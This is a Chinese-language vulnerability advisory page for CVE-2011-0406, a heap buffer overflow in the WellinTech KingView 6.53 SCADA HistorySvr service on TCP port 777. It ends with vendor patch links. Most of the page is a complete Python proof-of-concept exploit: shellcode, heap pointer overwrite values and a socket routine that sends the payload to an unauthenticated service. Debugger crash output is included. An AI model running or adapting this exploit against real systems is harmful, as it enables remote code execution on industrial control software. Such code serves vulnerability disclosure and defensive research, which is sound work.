发布日期：2011-01-09
更新日期：2011-03-16

受影响系统：

Wellintech KingView 6.53

描述：

---

BUGTRAQ  ID: 45727
CVE(CAN) ID: CVE-2011-0406

Kingview是亚控公司推出的第一款针对中小型项目推出的用于监视与控制自动化设备和过程的SCADA产品。

WellinTech KingView 6.53的HistorySvr.exe存在堆缓冲区溢出漏洞，远程攻击者通过向TCP端口777发送较长的请求，即可在受影响应用上下文中执行任意代码。

<*来源：Dillon Beresford
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC
## Date: 9/28/2010
## Author: Dillon Beresford
## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
## Version: 6.53 (English)
## Tested on: Windows XP SP1 ( works on SP2 and SP3 ) will release new targets after CERT advisory is public.

## Shouts to HD Moore JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew.
## Thanks to all who share knowledge about heap smashing and heap bypass techniques.

## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded.
## No patch or response from vendor as of 1/9/2011
## Lets get this into the wild and see how long it takes them to respond.

## Looks like persistence pays off. :-)

## SP2/SP3 targets will be available soon. (putting into metasploit this is just a poc to get response from vendor).
## Vendor: Beijing WellinControl Technology Development Co.,Ltd
## http://www.wellintek.com

## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM
## I have made every attempt and yet they choose to ignore...
## This PoC should wake up the dragon. >:-]
## With more to come!

## KingView software is a high-pormance production which can be used to building a data information
## service platform in automatic field. KingView software can provid graphic visualization which takes
## your operations management, control and optimization . KingView is widely used in power,
## water conservancy,buildings, coalmine, environmental protection, metallurgy and so on.
## And now KingView software is used in national defense, Aero-Space in China.

## Notes: The HistorySrv process listens on TCP port 777
## This process does not require any authentication from clients

## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow srweeping dragon.

## Windows XP SP1 (x86)
## CommandLine: "C:\Program Files\Kingview\HistorySvr.exe"
## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48
## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0         nv up ei pl nz na po nc
## cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
## ntdll!DbgBreakPoint:
## 77f767cd cc              int     3
## 0:000> g
## ModLoad: 71950000 71a34000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll
## ModLoad: 5ad70000 5ada4000   C:\WINDOWS\System32\uxtheme.dll
## ModLoad: 71a50000 71a8b000   C:\WINDOWS\system32\mswsock.dll
## ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
## (318.6d4): Access violation - code c0000005 (first chance)
## First chance exceptions are reported before any exception handling.
## This exception may be expected and handled.
## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0         nv up ei pl zr na pe nc
## cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901            mov     dword ptr [ecx],eax  ds:0023:44444444=????????
## 0:000> u
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901            mov     dword ptr [ecx],eax
## 77f62571 894804          mov     dword ptr [eax+4],ecx
## 77f62574 3bc1            cmp     eax,ecx
## 77f62576 7534            jne     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62578 668b06          mov     ax,word ptr [esi]
## 77f6257b 663d8000        cmp     ax,80h
## 77f6257f 732b            jae     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62581 0fb7c8          movzx   ecx,ax


## usage python exploit.py 127.0.0.1 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: D1N | twitter.com/D1N "

shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\x44\x80\xc2\x77"
"\xFF\xD1\x90\x90")

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

print "  [+] Herrow Sweeping Dragon..."
print "  [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host,port))
s.send(exploit)  
data = s.recv(1024)

print "  [+] Closing connection.."
s.close()  
print "  [+] Done!"

建议：

---

厂商补丁：

Wellintech
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.kingview.com/products/detail.aspx?contentid=24

http://www.kingview.com/news/detail.aspx?contentid=528

浏览次数：2672
严重程度：0（网友投票）